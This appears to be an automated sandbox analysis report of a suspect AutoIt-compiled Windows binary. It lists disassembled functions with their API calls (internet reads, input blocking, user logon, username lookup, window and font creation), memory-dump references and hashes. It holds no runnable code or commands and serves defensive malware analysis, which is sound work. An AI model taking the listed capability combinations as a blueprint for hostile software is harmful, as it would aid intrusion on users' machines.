                            Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                            • String ID:
                            • API String ID: 901099227-0
                            • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                            • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                            Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                            Download Yara Rule
                            APIs
                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Proc
                            • String ID:
                            • API String ID: 2346855178-0
                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                            Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • BlockInput.USER32(00000001), ref: 0045A38B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            • API String ID: 3456056419-0
                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                            Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                            Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                            Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                            Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: N@
                            • API String ID: 0-1509896676
                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                            Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                            Function 004129D0 Relevance: .4, Instructions: 355COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                            Function 004125E8 Relevance: .3, Instructions: 349COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                            Function 00412216 Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                            Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(?), ref: 0045953B
                            • DeleteObject.GDI32(?), ref: 00459551
                            • DestroyWindow.USER32(?), ref: 00459563
                            • GetDesktopWindow.USER32 ref: 00459581
                            • GetWindowRect.USER32(00000000), ref: 00459588
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                            • ShowWindow.USER32(?,00000004), ref: 00459865
                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                            • GetStockObject.GDI32(00000011), ref: 004598CD
                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                            • DeleteDC.GDI32(00000000), ref: 004598F8
                            • _wcslen.LIBCMT ref: 00459916
                            • _wcscpy.LIBCMT ref: 0045993A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                            • GetDC.USER32(00000000), ref: 004599FC
                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 4040870279-2373415609
                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                            Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000012), ref: 0044181E
                            • SetTextColor.GDI32(?,?), ref: 00441826
                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                            • GetSysColor.USER32(0000000F), ref: 00441849
                            • SetBkColor.GDI32(?,?), ref: 00441864
                            • SelectObject.GDI32(?,?), ref: 00441874
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                            • GetSysColor.USER32(00000010), ref: 004418B2
                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                            • DeleteObject.GDI32(?), ref: 004418D5
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                            • FillRect.USER32(?,?,?), ref: 00441970
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                            • String ID:
                            • API String ID: 69173610-0
                            • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                            • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                            Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(?), ref: 004590F2
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                            • GetStockObject.GDI32(00000011), ref: 004592AC
                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                            • DeleteDC.GDI32(00000000), ref: 004592D6
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                            • GetStockObject.GDI32(00000011), ref: 004593D3
                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
